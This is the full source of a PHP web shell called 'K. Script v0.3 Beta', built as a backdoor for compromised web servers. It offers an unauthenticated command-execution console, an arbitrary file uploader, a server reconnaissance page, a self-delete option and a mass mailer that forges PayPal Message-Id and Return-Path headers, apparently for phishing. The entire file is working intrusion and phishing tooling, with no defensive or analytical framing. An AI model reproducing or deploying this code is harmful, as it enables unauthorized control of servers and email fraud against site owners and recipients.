<?php $Title = "K. Script v0.3 Beta By $alla$$: "; $GraphicHeader = '<meta http-equiv="Content-Type" content="text/html; charset=windows-1257"> <style type="text/css"> body{ background-color: #F6F6F6; text-align: center; width: 100%; padding: 0px; margin: 0px; } #unCenter{ width: 300px; margin-left: auto; margin-right: auto; text-align: left; } #unCenterShell{ width: 600px; margin-left: auto; margin-right: auto; text-align: left; } #unCenterMailer{ width: 700px; margin-left: auto; margin-right: auto; text-align: left; } #unCenterProxy{ width: 750px; margin-left: auto; margin-right: auto; } #unCenterHeader{ width: 800px; margin-left: auto; margin-right: auto; text-align: center; } .Marged{ margin-top: 20px; } .Input{ border: 1px solid #DADADA; } .Table{ border: 1px solid #DADADA; background-color: White; padding: 10px; font: 11px Tahoma, Verdana, sans-serif; line-height: 17px; color: Gray; } .TableHeader{ border: 1px solid #DADADA; background-color: White; padding: 2px; font: 11px Tahoma, Verdana, sans-serif; line-height: 17px; color: Gray; } a{ text-decoration: none; color: #003473; } a:hover{ text-decoration: none; color: #F5822B;} img{ border: 0px; } h1{ font-size: 14px; font-weight: bold; padding: 0px; margin-bottom: 7px; } .Black{ color: Gray; font: 11px Tahoma, Verdana, sans-serif; } .BlackRealy{ color: Black; font: 12px Tahoma, Verdana, sans-serif; } </style>'; $SiteHeader = '</head><body><br> <a href="?MainPage"><img src="http://kenshin-lt.net/images/fuck.gif" width="50" height="50" alt="Home"></a> <div><hr width="90%" size="1.5px" noshade="noshade"></div>'; $GraphicFooter = '<div><br><hr width="90%" size="1.5px" noshade="noshade"></div> <div align="center" class="black">[<a href="?ProxyDetect">ProxyDetect</a>] <span class="BlackRealy"> | </span>[<a href="?Uploader">FileUploader</a>] <span class="BlackRealy"> | </span>[<a href="?PHPShell">PHPShell</a>] <span class="BlackRealy"> | </span>[<a href="?PortCheck">PortCheck</a>] <span class="BlackRealy"> | </span>[<a href="?Mailer">MassMailer</a>] <span class="BlackRealy"> | </span>[<a href="?DeleteMe">Delete Me</a>]</div> <div align="center" class="Black">Copyright © 2007 <a href="mailto:shaun.wades@gmail.com">Shaun$$</a></div> </body></html>'; $Slash = '/'; if ($_SERVER['QUERY_STRING'] == '') header("Location: http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?MainPage"); if(isset($_GET['PHPShell'])) { $passwd = array(); $aliases = array(); session_start(); if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) { $_SESSION['cwd'] = getcwd(); $_SESSION['history'] = array(); $_SESSION['output'] = ''; } if (!empty($_REQUEST['command'])) { if (get_magic_quotes_gpc()) { $_REQUEST['command'] = stripslashes($_REQUEST['command']); } if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) unset($_SESSION['history'][$i]); array_unshift($_SESSION['history'], $_REQUEST['command']); $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n"; if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) { $_SESSION['cwd'] = dirname(__FILE__); } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) { if ($regs[1][0] == '/') { $new_dir = $regs[1]; } else { $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; } while (strpos($new_dir, '/./') !== false) $new_dir = str_replace('/./', '/', $new_dir); while (strpos($new_dir, '//') !== false) $new_dir = str_replace('//', '/', $new_dir); while (preg_match('|/\.\.(?!\.)|', $new_dir)) $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); if ($new_dir == '') $new_dir = '/'; if (@chdir($new_dir)) { $_SESSION['cwd'] = $new_dir; } else { $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; } } else { chdir($_SESSION['cwd']); $length = strcspn($_REQUEST['command'], " \t"); $token = substr($_REQUEST['command'], 0, $length); if (isset($aliases[$token])) $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length); $p = proc_open($_REQUEST['command'], array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); while (!feof($io[1])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } while (!feof($io[2])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($p); } } if (empty($_SESSION['history'])) { $js_command_hist = '""'; } else { $escaped = array_map('addslashes', $_SESSION['history']); $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; } echo '<xml version="1.0" encoding="UTF-8">'; echo '<html><head><title>'.$Title.' PHPShell</title>'; echo $GraphicHeader; ?> <script type="text/javascript" language="JavaScript"> var current_line = 0; var command_hist = new Array(<?php echo $js_command_hist ?>); var last = 0; function key(e) { if (!e) var e = window.event; if (e.keyCode == 38 && current_line < command_hist.length-1) { command_hist[current_line] = document.shell.command.value; current_line++; document.shell.command.value = command_hist[current_line]; } if (e.keyCode == 40 && current_line > 0) { command_hist[current_line] = document.shell.command.value; current_line--; document.shell.command.value = command_hist[current_line]; } } function init() { document.shell.setAttribute("autocomplete", "off"); document.shell.output.scrollTop = document.shell.output.scrollHeight; document.shell.command.focus(); } </script> <? echo $SiteHeader; ?> <body onload="init()"> <?php error_reporting (E_ALL); if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 10; ?> <div id="unCenterShell"><div class="Marged"><div class="Table"> <center><div>Current Directory: <?php echo $_SESSION['cwd'] ?></div></center> </div></div></div> <div id="unCenterShell"><div class="Marged"><div class="Table"><center> <div><form name="shell" action="<?php echo $_SERVER['PHP_SELF'] .'?PHPShell'?>" method="post"></div> <div><textarea class="Input" name="output" readonly="readonly" cols="68" rows="<?php echo $_REQUEST['rows'] ?>"> <?php $lines = substr_count($_SESSION['output'], "\n"); $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines)); echo rtrim($padding . $_SESSION['output']); ?> </textarea></div> <div>$ <input class="Input" name="command" type="text" onkeyup="key(event)" size="89" tabindex="1"><div> </center></div></div></div> <div id="unCenter"><div class="Marged"><div class="Table"><center> <div><input type="submit" value="Execute Command" /> <input type="submit" name="reset" value="Reset" /></div> <div>Rows: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" /></div> </form></center></div></div></div> <? echo $GraphicFooter; } if(isset($_GET['Uploader'])){ echo '<html><head><title>'.$Title.' Uploader</title>'; echo $GraphicHeader; echo $SiteHeader; if(isset($_POST['upl_files'])){ echo '<div id="unCenter"><div class="Marged"><div class="Table"> <div>Uploaded Files:<br></div>'; //print_r($_FILES['file_n']); $up_mas = $_FILES['file_n']; $mas_name = array(); $mas_tmp = array(); for($i=0; $i<10; $i++){ if(!empty($up_mas['name'][$i])){ $j = count($mas_name); $mas_name[$j] = $up_mas['name'][$i]; $mas_tmp[$j] = $up_mas['tmp_name'][$i]; } } for($i=0; $i<count($mas_name); $i++){ $upl_file = $_POST['mas_dir'].$mas_name[$i]; if(move_uploaded_file($mas_tmp[$i], $upl_file)){ echo '<a href="'.$mas_name[$i].'">'.$mas_name[$i].'</a>, '; } } } echo "</div></div></div>"; ?> <div id="unCenter"><div class="Marged"><div class="Table"><center><br> <form enctype="multipart/form-data" method="post" action=""> <div>Upload Files to: <? echo'<input class="input" type="text" name="mas_dir" value='.getcwd().$Slash.' size="40"><br><br>'; ?> <? for($i=0; $i<10; $i++){ echo '<div><input class="Input" type="file" name="file_n[]"></div>'; } ?> </div><div><input type="reset" name="reset" value="Reset"> <input type="submit" name="upl_files" value="upload"></div> </center></div></div></div> <? echo $GraphicFooter; } if(isset($_GET['MainPage'])){ echo '<html><head><title>'.$Title.'</title>'; echo $GraphicHeader; echo $SiteHeader; print "<div id=unCenterHeader><div class=TableHeader>"; print((@ini_get('safe_mode'))?("<b>Safe Mode: <font color=green>ON</font><b>"):("<b>Safe Mode: <font color=red>OFF</font>")); print "</b><span class=BlackRealy> | </span>"; print "<b>PHP version: <font color=green>".@phpversion()."</font></b>"; print "<span class=BlackRealy> | </span>"; print((@function_exists('curl_version'))?("<b>cURL: <font color=green>ON</font>"):("<b>cURL: <font color=red>OFF</font>")); print "</b><span class=BlackRealy> | </span>"; if(@function_exists('mysql_connect')){ echo "<b>MySQL: <font color=green>ON</font>"; } else { echo "<b>MySQL: <font color=red>OFF</font>"; } print "</b><span class=BlackRealy> | </span>"; if(@function_exists('mssql_connect')){ echo "<b>MSSQL: <font color=green>ON</font>"; } else { echo "<b>MSSQL: <font color=red>OFF</font>"; } print "</b><span class=BlackRealy> | </span>"; if(@function_exists('pg_connect')){ echo "<b>PostgreSQL: <font color=green>ON</font>"; } else { echo "<b>PostgreSQL: <font color=red>OFF</font>";} print "</b><span class=BlackRealy> | </span>"; if(@function_exists('ocilogon')){ echo "<b>Oracle: <font color=green>ON</font>"; } else { echo "<b>Oracle: <font color=red>OFF</font>"; } print "</b></b></div></div>"; echo<<<MainPageGraphic <div id="unCenter"> <div class="Marged"> <div class="Table"> <center> <div></div> <div><a href="?ProxyDetect">ProxyDetect</a></div> <div><a href="?Uploader">FileUploader</a></div> <div><a href="?PHPShell">PHPShell</a></div> <div><a href="?PortCheck">PortCheck</a></div> <div><a href="?Mailer">MassMailer</a></div> <div><hr width="150px" size="1px" noshade="noshade"></div> <div><a href="?DeleteMe">Delete me</a></div> </center> </div> </div> </div> MainPageGraphic; echo $GraphicFooter; } if(isset($_GET['PortCheck'])) { echo '<html><head><title>'.$Title.' PortCheck</title>'; echo $GraphicHeader; echo $SiteHeader; echo "<div id=\"unCenter\"><div class=\"Marged\"><div class=\"Table\" style=\"padding-left: 20\">"; echo "<div align=\"center\">Under Reconstruction</div>"; echo "</div></div></div>"; echo $GraphicFooter; } if(isset($_GET['Mailer'])) { echo '<html><head><title>'.$Title.' Mailer</title>'; echo $GraphicHeader; echo $SiteHeader; if(!$action) $action = ""; if ($action=="send"){ $message = urlencode($message); $message = ereg_replace("%5C%22", "%22", $message); $message = urldecode($message); $message = stripslashes($message); $subject = stripslashes($subject); } ?> <!-- Mailer --> <form name="Mailer" method="post" action="<? echo $_SERVER['PHP_SELF'] . '?Mailer' ?>" enctype="multipart/form-data"> <div id="unCenterMailer"><div class="Marged"><div class="Table"> <div align="left"> <div style="padding-left: 20px;">Your Email: <input class="input" type="text" name="from" value="<?=$from?>" size="20"> <span style="padding-left: 122px;"></span>Your Name: <input class="input" type="text" name="realname" value="<?=$realname?>" size="20"></div> <div style="padding-left: 26px;">Reply-To: <input class="input" type="text" name="replyto" value="<?=$replyto?>" size="20"> <span style="padding-left: 123px;"></span>Attach File: <input class="input" type="file" name="file" size="20"></div> <div style="padding-left: 33px;">Subject: <input class="input" type="text" name="subject" value="<?=$subject?>" size="90"></div> </div> <div align="left"><span style="padding-left: 4px;"></span>Letter:<span style="padding-left: 392px;"></span>Recipients:</div> <div><textarea class="input" name="message" cols="50" rows="10"><?=$message?></textarea> <textarea class="input" name="emaillist" cols="25" rows="10"><?=$emaillist?></textarea></div> </div></div></div> <div id="unCenter"><div class="Marged"><div class="Table"> <div align="center"><input type="radio" name="contenttype" value="plain">Plain <input type="radio" name="contenttype" value="html" checked>HTML <input type="hidden" name="action" value="send"><input class="input" type="submit" value="Send eMails"></div> </div></div></div></form> <? if ($action=="send"){ if (!$from && !$subject && !$message && !$emaillist){ echo '<div id="unCenter"><div class="Marged"><div class="Table"><center> <div>Please complete all fields before sending your message.</div> </center></div></div></div>'; echo $GraphicFooter; exit; } $allemails = split("\n", $emaillist); $numemails = count($allemails); If ($file_name){ @copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server"); $content = fread(fopen($file,"r"),filesize($file)); $content = chunk_split(base64_encode($content)); $uid = strtoupper(md5(uniqid(time()))); $name = basename($file); } echo '<div id="unCenter"><div class="Marged"><div class="Table"><center>'; $messid = "1140150615.28818"; for($x=0; $x<$numemails; $x++){ $to = $allemails[$x]; if ($to){ $to = ereg_replace(" ", "", $to); $message = ereg_replace("&email&", $to, $message); $subject = ereg_replace("&email&", $to, $subject); print "Sending: [ $to ] "; flush(); $header = "From: $realname <$from>\r\n"; $header .= "Reply-To: $replyto\r\n"; $header .= "MIME-Version: 1.0\r\n"; If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; If ($file_name) $header .= "--$uid\r\n"; $header .= "Message-Id:<$messid@paypal.com>\r\n"; $header .= "Return-Path: <service@paypal.com>\r\n"; $header .= "Content-Type: text/$contenttype\r\n"; $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; $header .= "$message\r\n"; If ($file_name) $header .= "--$uid\r\n"; If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; If ($file_name) $header .= "$content\r\n"; If ($file_name) $header .= "--$uid--"; mail($to, $subject, "", $header); print "........Success!<br>"; flush(); } } echo "</center></div></div></div>"; } ?> <!-- </Mailer> --> <? echo $GraphicFooter; } ?> <? if(isset($_GET['DeleteMe'])){ echo '<html><head><title>'.$Title.' DeleteMe</title>'; echo $GraphicHeader; echo $SiteHeader; $del = $_GET['del']; if($del=="TRUE"){ $url = "http://" .$_SERVER['HTTP_HOST']. "/"; print "<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0; URL= $url \">"; unlink('kscr.php'); } ?> <div id="unCenter"><div class="Marged"><div class="Table"> <center><div></div> <div style="font-size 10px: bold; font-weight: bold;">Delete Me?</div> <br><div><a href="?DeleteMe&del=TRUE">Yes (Delete)</a><img src="" border="0" height="0" width="50"><a href="?MainPage">No (Go Home)</a></div> </center></div></div></div> <? echo $GraphicFooter; } ?> <? if(isset($_GET['ProxyDetect'])){ echo $GraphicHeader; echo $SiteHeader; echo '<html><head><title>'.$Title.' ProxyDetect</title>'; ?> <div id="unCenterProxy"><div class="Marged"><div class="Table"> <div class="Menu" align=center><b><u>Your IP Address:</u></b><br><br></div> <? $proxy = ""; $viaproxy = ""; if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) $proxy = TRUE; if($proxy) $viaproxy = "Via Proxy"; $host = gethostbyaddr($_SERVER['REMOTE_ADDR']); $ip = getenv("REMOTE_ADDR"); if($host==$ip) $host = "N/A"; echo "<div align=center ><b>".$ip." (".$host.")</b>".$viaproxy."</div>"; ?> <hr size=1 width=80%><br> <div class=Menu align=center><b><u>Your HTTP Headers:</u></b><br><br/></div> <div align="left" style="padding-left: 10px"> <? if(!empty($_SERVER['HTTP_CONNECTION'])) echo "<li> <span style=\"color: Black;\">HTTP_CONNECTION: </span><b>".$_SERVER['HTTP_CONNECTION']."</b><br>"; if(!empty($_SERVER['HTTP_KEEP_ALIVE'])) echo "<li> <span style=\"color: Black;\">HTTP_KEEP_ALIVE: </span><b>".$_SERVER['HTTP_KEEP_ALIVE']."</b><br>"; if(!empty($_SERVER['HTTP_ACCEPT'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT: </span><b>".$_SERVER['HTTP_ACCEPT']."</b><br>"; if(!empty($_SERVER['HTTP_ACCEPT_CHARSET'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT_CHARSET: </span><b>".$_SERVER['HTTP_ACCEPT_CHARSET']."</b><br>"; if(!empty($_SERVER['HTTP_ACCEPT_ENCODING'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT_ENCODING: </span><b>".$_SERVER['HTTP_ACCEPT_ENCODING']."</b><br>"; if(!empty($_SERVER['HTTP_ACCEPT_LANGUAGE'])) echo "<li> <span style=\"color: Black;\">HTTP_ACCEPT_LANGUAGE: </span><b>".$_SERVER['HTTP_ACCEPT_LANGUAGE']."</b><br>"; if(!empty($_SERVER['HTTP_HOST'])) echo "<li> <span style=\"color: Black;\">HTTP_HOST: </span><b>".$_SERVER['HTTP_HOST']."</b><br>"; if(!empty($_SERVER['HTTP_USER_AGENT'])) echo "<li> <span style=\"color: Black;\">HTTP_USER_AGENT: </span><b>".$_SERVER['HTTP_USER_AGENT']."</b><br>"; if($proxy) echo "<li> <span style=\"color: Black;\">HTTP_X_FORWARDED_FOR: </span><b>".$_SERVER['HTTP_X_FORWARDED_FOR']."</b><br>"; if (($proxy) && (!empty($_SERVER['HTTP_VIA']))){ echo "<li> <span style=\"color: Black;\">HTTP_VIA: </span><b>".$_SERVER['HTTP_VIA']."</b><br>"; } ?> </div></div></div></div> <? echo $GraphicFooter; } exit;?>